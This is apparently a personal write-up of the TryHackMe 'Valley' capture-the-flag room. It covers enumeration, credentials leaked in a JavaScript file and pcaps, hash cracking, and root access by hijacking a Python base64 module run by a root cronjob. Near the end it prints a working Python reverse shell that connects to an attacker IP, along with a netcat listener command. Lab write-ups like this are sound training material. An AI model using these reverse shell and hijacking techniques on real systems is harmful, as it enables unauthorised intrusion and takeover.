TryHackMe Valley Writeup

TryHackMe Valley Writeup

Christoph Behr's photo
Christoph Behr
·

4 min read

Table of contents

Introduction

The Room Valley is one of TryHackMe's easy boxes. We need to find the user and the root flag to complete the room. In the description, it says: Boot the box and find a way in to escalate all the way to root!

Initial Access

I grew tired of typing IPs in the terminal so this time I added the rooms IP to /etc/hosts as valley.thm. Then I started with an Nmap scan as usual.

We have SSH on port 22 and a website on port 80. I checked the website, but nothing interesting to find here.

The buttons led to a gallery and a pricing table. In the site's source and the inspector's view, there was nothing else to see. I quickly searched for the usual /robots, /robots.txt etc. but no luck here as well. I used gobuster to enumerate the website further.

The directory /server status was the only newcomer on the list. But Access was forbidden. I noticed that the pictures from the gallery were stored in /static. The first picture was stored in /static/1 the second in /static/2 etc.. I tried a couple of other combinations like /static/99, /static/01 etc., and out of pure luck /static/00 gave me a hit.

There I got another directory to try, which I did immediately. It leads to a login page

This time I had no luck by trying the usual suspects like admin/admin. So I checked again the source of the site and gave it a closer look in the inspector. In the inspector, I found a suspicious dev.js file.

In the dev.js file, I found the credentials to log in.

Again I got some notes. The first one gave me the impression to try and reuse the found credentials, the last one made me do another Nmap scan for all possible ports.

There is one additional Port open with an unknown service. I'm expecting it to be the said ftp port. I tried the credentials found in the dev.js. and had access to the ftp server.

I found three files, and all of them seemed to be packet captures. I downloaded them to my machine and inspected them further with Wireshark. After a couple of minutes, I found some credentials in the siemHTTTP2.pcap. I used them to log in via ssh.

Here I found the user flag.

Privilege Escalation

In valleyDev's directory, I found a file valleyAuthenticator. It seems to be a compiled program but I couldn't start it. I checked if Python was available on the valleyDevs machine, and it was. So I opened a python simple HTTP server and downloaded the file to my machine for further inspection. I tried to decompile it with Ghidra, but wasn't able to get anything useful. I'm by no means an Expert in reverse engineering, it's something I need to address in the future. I spent some time trying to reverse-engineer the file, but after some time I gave up and looked at this writeup. The author used a tool called upx. I followed CyberiumXs instructions and I was able to get two md5 hashes. I cracked them with an online Hash tool and got credentials for the user valley. I used them to log in via SSH.

Getting Root

In valleys directory, there was nothing of interest to find. I checked for interesting crontabs.

I found a Python program that ran as root. I opened it and immediately noticed the base64 import. This meant I could possible use a technique called Path Hijacking.

I located the base64.py file.

And opened it in Nano to edit it. So I can sneak in a reverse shell. I used this reverse shell in the b64encode() function of the base64.py file.

import sys
import socket
import os
import pty
s=socket.socket()
s.connect(("10.8.31.69", 1234))
[os.dup2(s.fileno(), fd) for fd in (0,1,2)]
pty.spawn("/bin/bash")

While I waited for the cronjob to run, I set up a Netcat listener on port 1234.

nc -lvnp 1234

After the cronjob ran I got a reverse shell as root and was able to retrieve the root flag.

And the room was completed.

PathHijackingtryhackmeCTF